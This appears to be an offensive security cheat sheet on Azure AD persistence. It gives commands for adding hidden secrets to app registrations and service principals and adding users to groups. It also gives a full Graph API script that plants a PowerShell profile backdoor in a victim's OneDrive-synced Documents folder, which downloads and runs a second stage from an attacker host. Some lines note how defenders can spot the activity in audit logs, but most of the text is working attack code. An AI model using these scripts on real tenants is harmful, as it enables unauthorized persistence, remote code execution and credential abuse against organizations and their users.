Azure AD - Persistence
Add Secrets to Application
- Add secrets with lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1
PS > . C:\Tools\Add-AzADAppSecret.ps1
PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose
- Use the new secret to authenticate as the Service Principal
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force
PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password)
PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
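The same persistence step done with the Microsoft Graph PowerShell SDK instead of the third-party script, as an added example that is not part of the original page or of OffensiveCloud. It assumes the Graph session has Application.ReadWrite.All (or owns the target app) and uses `<app-object-id>` and `<TenantID>` as placeholders; the credential display name is an arbitrary choice.

```powershell
# Added example, not from the original page: add a client secret to an existing
# app registration via Microsoft Graph, then sign in as its service principal.
# Assumes: Application.ReadWrite.All on the Graph session (or ownership of the
# app); <app-object-id> is the *object id* of the app registration, not its AppId.
Import-Module Microsoft.Graph.Applications
Connect-MgGraph -Scopes "Application.ReadWrite.All"

$appObjectId = "<app-object-id>"

# Fetch the application to get both ids and to see what credentials already exist
$app = Get-MgApplication -ApplicationId $appObjectId
$app.PasswordCredentials | Select-Object DisplayName, KeyId, EndDateTime

# Add a long-lived password credential. Graph returns SecretText exactly once.
$cred = Add-MgApplicationPassword -ApplicationId $app.Id -PasswordCredential @{
    displayName = "Backup Sync"             # arbitrary; chosen to blend in
    endDateTime = (Get-Date).AddYears(2)    # two-year lifetime
}
Write-Host "KeyId $($cred.KeyId) added to $($app.DisplayName) ($($app.AppId))"

# Authenticate as the service principal with the new secret
$password = ConvertTo-SecureString $cred.SecretText -AsPlainText -Force
$creds    = New-Object System.Management.Automation.PSCredential($app.AppId, $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant "<TenantID>"
```

The call shows up in the Entra ID audit log as "Update application – Certificates and secrets management" with the calling identity as initiator, so defenders watching that activity on high-privilege apps will see it; the PasswordCredentials listing at the top is what they compare against.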
Add Service Principal
- Generate a new service principal password/secret (requires Application.ReadWrite.All or ownership of the service principal)
PS > Import-Module Microsoft.Graph.Applications
PS > Connect-MgGraph
PS > $servicePrincipalId = "<service-principal-id>"
PS > $params = @{ passwordCredential = @{ displayName = "NewCreds" } }
PS > Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
Add User to Group
PS > Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
Note: Add-AzureADGroupMember belongs to the deprecated AzureAD module; the Microsoft Graph SDK equivalent is New-MgGroupMember -GroupId <group_id> -DirectoryObjectId <user_id>. Either way the change is logged as "Add member to group" in the Entra ID audit log.
PowerShell Profile Backdoor Using KFM
OneDrive for Business Known Folder Move (KFM) is a feature that lets users and organizations automatically redirect the contents of key Windows user folders (Desktop, Documents, and Pictures) from the local PC to OneDrive, keeping them synced.
A PowerShell profile is a script file that runs whenever a new PowerShell session starts (for example when PowerShell or Windows Terminal is opened). Users and administrators often customize their profiles to set aliases, environment variables, and functions, or to pre-load modules. Because it runs on every launch, write access to the profile is code execution in the user's context.
Requirements:
- A Graph token with the Files.ReadWrite.All privilege (write access to the target user's OneDrive)
- The target user has KFM enabled for Documents
Methodology:
Known Folder Move redirects the user's Documents (and/or Desktop, Pictures) folder into OneDrive for Business, typically:
C:\Users\<username>\Documents → C:\Users\<username>\OneDrive - <TenantName>\Documents
PowerShell resolves its profile path through the Documents known folder, so $PROFILE now points inside the synced folder: Documents\PowerShell\Microsoft.PowerShell_profile.ps1 for PowerShell 7 and Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 for Windows PowerShell 5.1. Anything written to that path in the user's OneDrive (for example through the Graph drive API) is synced down to the endpoint.
Push a malicious PowerShell profile to $HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1 (and/or the WindowsPowerShell path); it executes the next time the user opens a PowerShell session. It does not run if the session is started with -NoProfile or if the execution policy is Restricted.
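The upload step carried out remotely through the Microsoft Graph drive API, as an added example that is not part of the original page. It assumes `$graphToken` holds a bearer token with Files.ReadWrite.All, that `victim@contoso.onmicrosoft.com` is the target user, and that `https://<attacker-host>/stage1.ps1` is a placeholder for the second stage; it writes both the PowerShell 7 and the Windows PowerShell 5.1 profile paths.

```powershell
# Added example, not from the original page: plant a PowerShell profile in a
# victim's KFM-synced Documents folder via Graph. Assumes $graphToken carries
# Files.ReadWrite.All; the UPN and the stage-1 URL below are placeholders.
$graphToken = "<access-token>"
$targetUpn  = "victim@contoso.onmicrosoft.com"
$headers    = @{ Authorization = "Bearer $graphToken" }
$driveRoot  = "https://graph.microsoft.com/v1.0/users/$targetUpn/drive/root"

# Profile payload: fetch and run a second stage, never break the user's shell.
$profileContent = @'
try {
    Invoke-Expression (Invoke-RestMethod -Uri 'https://<attacker-host>/stage1.ps1')
} catch { }
'@
$bytes = [System.Text.Encoding]::UTF8.GetBytes($profileContent)

# 1. Confirm KFM is in effect: a Documents folder must exist in the user's OneDrive.
$docs = Invoke-RestMethod -Uri "${driveRoot}:/Documents" -Headers $headers
Write-Host "Documents folder present ($($docs.folder.childCount) children)"

# 2. Make sure both profile directories exist. conflictBehavior=fail turns an
#    existing folder into a 409, which we swallow.
foreach ($folder in @("PowerShell", "WindowsPowerShell")) {
    $body = @{
        name   = $folder
        folder = @{}
        "@microsoft.graph.conflictBehavior" = "fail"
    } | ConvertTo-Json
    try {
        Invoke-RestMethod -Method Post -Uri "${driveRoot}:/Documents:/children" `
            -Headers $headers -ContentType "application/json" -Body $body | Out-Null
        Write-Host "Created Documents/$folder"
    } catch {
        Write-Host "Documents/$folder already exists"
    }
}

# 3. Simple upload (< 4 MB) creates or overwrites the profile in each location.
#    pwsh 7+ reads Documents\PowerShell, Windows PowerShell 5.1 reads Documents\WindowsPowerShell.
$profilePaths = @(
    "Documents/PowerShell/Microsoft.PowerShell_profile.ps1",
    "Documents/WindowsPowerShell/Microsoft.PowerShell_profile.ps1"
)
foreach ($path in $profilePaths) {
    $resp = Invoke-RestMethod -Method Put -Uri "${driveRoot}:/${path}:/content" `
        -Headers $headers -ContentType "text/plain" -Body $bytes
    Write-Host "Uploaded $($resp.name) ($($resp.size) bytes) -> $($resp.parentReference.path)"
}
```

The OneDrive sync client pulls the file down the next time it syncs, and the profile runs at the user's next PowerShell launch. For defenders, the write is visible in the unified audit log as a FileUploaded / FileModified event performed by the application identity rather than the user, and profile scripts landing in OneDrive from a non-interactive principal are a strong signal.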